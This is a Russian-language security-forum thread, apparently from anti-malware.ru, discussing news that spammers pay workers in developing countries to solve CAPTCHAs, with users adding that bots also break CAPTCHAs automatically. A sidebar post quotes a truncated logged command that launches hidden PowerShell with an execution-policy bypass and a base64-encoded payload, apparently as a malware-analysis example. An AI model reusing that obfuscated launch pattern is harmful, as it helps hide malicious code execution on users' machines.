Перейти к содержанию
AM_Bot

Спамеры платят жителям развивающихся стран за прохождение тестов CAPTCHA

Recommended Posts

AM_Bot

Cпамеры платят жителям Индии, Бангладеш, Китая и других развивающихся стран за прохождение captcha-тестов (проверок, при которых необходимо ввести текст на изображении). Такие тесты используются в основном для отсеивания спам-роботов. Согласно расценкам сайта Freelancer.com, плата за такую работу составляет от $0,8 до $1,20 за тысячу пройденных тестов.Читать далее

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

А вы говорите боты, боты ... ручками регится народ, чтобы потом спам уже автоматизированно постить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
UIT

Я буквально недавно встречал предложение (на русском языке) о дополнительном заработке путем разгадывания этих картинок. Правда на стоимость не обратил внимание.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Ну много явно не заработаешь, если $1 за 1000 captcha-тестов :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

Помню ещё давно мне друг предлагал таким способом заработать, но я отказался, хотя он сам говорил что заработал на этом немного денег :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
UIT
Помню ещё давно мне друг предлагал таким способом заработать,...

А это ведь что получается, что если спамеры платят жителям развивающихся стран - выходит, если есть такие предложения, то выгляни в окно и Третий мир пред тобой :) ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.

Ого ! Очень интересная и неожиданная новость, никогда про такое не слышал.

спасибо!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ego1st

Сергей а стоит ли печатать статьи в духе, секлаба? что за новости, то что китайцы и индийцы тысячами перебирают капчу было известно года эдак три назад когда более или менее нормальные капчи появились..не стоит ресурс в помойку превращать.. имхо

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин
Очень интересная и неожиданная новость, никогда про такое не слышал.

спасибо!

Сергей а стоит ли печатать статьи в духе, секлаба? что за новости, то что китайцы и индийцы тысячами перебирают капчу было известно года эдак три назад когда более или менее нормальные капчи появились..не стоит ресурс в помойку превращать.. имхо

Соглашусь с вами, будем избегать таких новостей. Хотя с другой стороны, народ обсуждает их, значит интересно ;)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001

Каптчу обходят и программно, и уже давно.

См. как хрумеры раскручиваются на AM:

_http://www.anti-malware.ru/forum/index.php?showuser=6622

_http://www.anti-malware.ru/forum/index.php?showuser=6261

_http://www.anti-malware.ru/forum/index.php?showuser=5773

_http://www.anti-malware.ru/forum/index.php?showuser=6995

_http://www.anti-malware.ru/forum/index.php?showuser=5592

_http://www.anti-malware.ru/forum/index.php?showuser=5640

А вот другой пример:

Трафик и боты в украинском интернете >>>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×